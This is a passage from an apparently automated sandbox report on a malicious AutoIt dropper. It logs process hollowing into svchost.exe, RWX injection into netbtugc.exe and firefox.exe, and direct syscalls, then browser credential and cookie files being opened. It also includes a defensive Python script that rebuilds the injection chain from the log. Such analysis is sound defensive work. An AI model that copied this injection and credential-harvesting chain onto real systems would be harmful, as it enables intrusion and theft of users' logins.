Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_00090B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_00062622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_0005083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000509D5 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_00050C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtQueryValueKey: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtTerminateThread: Direct from: 0x76EF2FCC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtReadFile: Direct from: 0x76EF2ADC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtResumeThread: Direct from: 0x76EF2FBC
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtCreateUserProcess: Direct from: 0x76EF371C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtOpenKeyEx: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | NtCreateKey: Direct from: 0x76EF2C6C
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 3116
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: BA7008
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_00091201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_00072BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_0009B226 SendInput,keybd_event
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000B22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rDHL8350232025-2.exe"
Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_00090B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_00091663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: rDHL8350232025-2.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000002.4462026429.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000000.2075041775.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000000.2221272960.0000000001441000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: rDHL8350232025-2.exe, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000002.4462026429.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000000.2075041775.00000000016D1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000002.4462026429.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000000.2075041775.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000000.2221272960.0000000001441000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000002.4462026429.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000000.2075041775.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000000.2221272960.0000000001441000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_00050698 cpuid
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000A8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_0008D27A GetUserNameW
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_0006B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
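The evasion entries above record two things a responder has to reassemble by hand: the cross-process chain (RWX section maps into svchost.exe, netbtugc.exe, qSVRmrwLYsrJTsNjTGrEW.exe and firefox.exe, a memory write into svchost.exe, a thread context set and an APC queued by netbtugc.exe) and the Nt* calls issued "Direct from" an address rather than through the Win32 wrappers, several of which are exactly the injection primitives (NtWriteVirtualMemory, NtMapViewOfSection, NtResumeThread, NtSetInformationThread). The Python below is an added triage example, not part of the Joe Sandbox report: it parses lines in the report's "Source: <process> <event>: <details>" layout, rebuilds the source-to-target injection edges, flags a target that the same process both created and filled with executable memory (the hollowing pattern seen for svchost.exe), and separates the direct syscalls that serve injection from the rest. The sample lines are constructed from this report with the random-named Program Files directory shortened to X; the event grammar and the injection-syscall list are this example's own assumptions.

```python
import ntpath
import re
from collections import defaultdict

# Constructed from this report's HIPS / PFW evasion entries; the random-named
# "C:\Program Files (x86)\<...>" directory is shortened to "X" for readability.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rDHL8350232025-2.exe"
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: BA7008
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\X\qSVRmrwLYsrJTsNjTGrEW.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
Source: C:\Program Files (x86)\X\qSVRmrwLYsrJTsNjTGrEW.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\X\qSVRmrwLYsrJTsNjTGrEW.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\X\qSVRmrwLYsrJTsNjTGrEW.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe Thread register set: target process: 3116
Source: C:\Windows\SysWOW64\netbtugc.exe Thread APC queued: target process: C:\Program Files (x86)\X\qSVRmrwLYsrJTsNjTGrEW.exe
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Program Files (x86)\X\qSVRmrwLYsrJTsNjTGrEW.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
Source: C:\Program Files (x86)\X\qSVRmrwLYsrJTsNjTGrEW.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\X\qSVRmrwLYsrJTsNjTGrEW.exe NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\X\qSVRmrwLYsrJTsNjTGrEW.exe NtQueryValueKey: Direct from: 0x76EF2BEC
"""

# Assumed grammar: "Source: <path> <event kind>: <details>". The source path
# is matched lazily up to the first known event keyword.
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) "
    r"(?P<kind>Process created|Section loaded|Memory written|"
    r"Thread APC queued|Thread register set|Nt[A-Za-z]+): (?P<rest>.*)$"
)
SECTION_RE = re.compile(r"^NULL target: (?P<dst>.+?) protection: (?P<prot>.+)$")
WRITE_RE = re.compile(r"^(?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+)$")
APC_RE = re.compile(r"^target process: (?P<dst>.+)$")
CREATE_RE = re.compile(r'^(?P<dst>.+?\.exe) "')

# Syscalls that, issued directly, are the usual building blocks of injection
# (this grouping is the example's own, not the sandbox's).
INJECTION_SYSCALLS = {
    "NtAllocateVirtualMemory", "NtProtectVirtualMemory", "NtWriteVirtualMemory",
    "NtMapViewOfSection", "NtResumeThread", "NtSetInformationThread",
    "NtQueueApcThread", "NtSetContextThread", "NtCreateUserProcess",
}


def parse_events(text):
    """Split report-style lines into {src, kind, rest}; lines that do not fit are skipped."""
    events = []
    for raw in text.strip().splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            events.append(m.groupdict())
    return events


def injection_edges(text):
    """(source exe, target exe) -> sorted list of cross-process primitives observed."""
    edges = defaultdict(set)
    for ev in parse_events(text):
        src, kind, rest = ntpath.basename(ev["src"]), ev["kind"], ev["rest"]
        if kind == "Section loaded":
            m = SECTION_RE.match(rest)
            label = "map:rwx" if "execute" in m["prot"] else "map:rw"
            edges[(src, ntpath.basename(m["dst"]))].add(label)
        elif kind == "Memory written":
            m = WRITE_RE.match(rest)
            edges[(src, ntpath.basename(m["dst"]))].add("write")
        elif kind == "Thread APC queued":
            m = APC_RE.match(rest)
            edges[(src, ntpath.basename(m["dst"]))].add("apc")
        elif kind == "Thread register set":
            # The report names the target by PID here, so the key is the PID string.
            edges[(src, rest.split("target process: ")[-1].strip())].add("set-context")
        elif kind == "Process created":
            m = CREATE_RE.match(rest)
            edges[(src, ntpath.basename(m["dst"]))].add("create")
    return {k: sorted(v) for k, v in edges.items()}


def hollowed_processes(text):
    """Targets that one source both created and wrote/mapped executable memory into."""
    return sorted(
        dst for (src, dst), prims in injection_edges(text).items()
        if "create" in prims and ({"write", "map:rwx"} & set(prims))
    )


def direct_syscalls(text):
    """Per source exe: direct Nt* calls split into injection-relevant and other."""
    result = defaultdict(lambda: {"injection": set(), "other": set()})
    for ev in parse_events(text):
        if ev["kind"].startswith("Nt") and ev["rest"].startswith("Direct from:"):
            bucket = "injection" if ev["kind"] in INJECTION_SYSCALLS else "other"
            result[ntpath.basename(ev["src"])][bucket].add(ev["kind"])
    return {exe: {b: sorted(s) for b, s in v.items()} for exe, v in result.items()}


if __name__ == "__main__":
    for (src, dst), prims in injection_edges(SAMPLE_LINES).items():
        print(f"{src} -> {dst}: {', '.join(prims)}")
    print("hollowed:", hollowed_processes(SAMPLE_LINES))
    print("direct syscalls:", direct_syscalls(SAMPLE_LINES))
```

The chain the script reconstructs matches the signatures at the top of the report: the AutoIt dropper hollows svchost.exe, svchost.exe maps RWX memory into both qSVRmrwLYsrJTsNjTGrEW.exe and netbtugc.exe, and netbtugc.exe is the process that sets a thread context, queues an APC and also maps into firefox.exe before it harvests credentials. The "Thread register set" entry identifies its target only by PID 3116, so that edge stays keyed by PID unless you join it against the report's process list.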

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
